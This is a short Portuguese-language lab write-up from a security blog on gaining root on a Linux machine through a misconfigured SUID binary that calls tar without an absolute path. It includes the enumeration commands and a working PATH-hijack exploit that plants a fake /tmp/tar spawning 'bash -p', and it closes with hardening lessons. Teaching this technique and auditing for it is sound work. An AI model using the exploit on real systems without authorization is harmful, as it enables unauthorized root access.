Tutorial

Write-up: Escalação de privilégios em máquina Linux via SUID mal configurado

22 de julho de 2026 · 2 min de leitura · Zero Day Security

Neste write-up vamos percorrer o processo completo de escalação de privilégios em uma máquina Linux vulnerável, desde a enumeração inicial até a obtenção de acesso root, explorando um binário com o bit SUID mal configurado.

1. Enumeração inicial

Após obter acesso como usuário de baixo privilégio, o primeiro passo é mapear binários com permissão SUID:

find / -perm -4000 -type f 2>/dev/null

Entre os resultados, identificamos um binário fora do padrão:

-rwsr-xr-x 1 root root 35608 Jun 12 2025 /usr/local/bin/backup_tool

2. Análise do binário

Executando strings no binário, percebemos que ele chama o utilitário tar sem especificar o caminho absoluto:

strings /usr/local/bin/backup_tool | grep tar

Isso indica uma possível exploração via manipulação de $PATH.

3. Exploração

Criamos um binário tar malicioso e ajustamos o $PATH para que seja executado no lugar do tar legítimo:

cat << 'EOF' > /tmp/tar
#!/bin/bash
/bin/bash -p
EOF
chmod +x /tmp/tar
export PATH=/tmp:$PATH
/usr/local/bin/backup_tool

4. Confirmação do acesso root

whoami
# root

Lições aprendidas

  • Nunca conceder SUID a scripts ou binários que invocam outros programas sem caminho absoluto.
  • Auditar periodicamente binários com bits SUID/SGID no sistema.
  • Utilizar PATH fixo e restritivo em scripts privilegiados.

Gostou? Receba novos artigos por e-mail.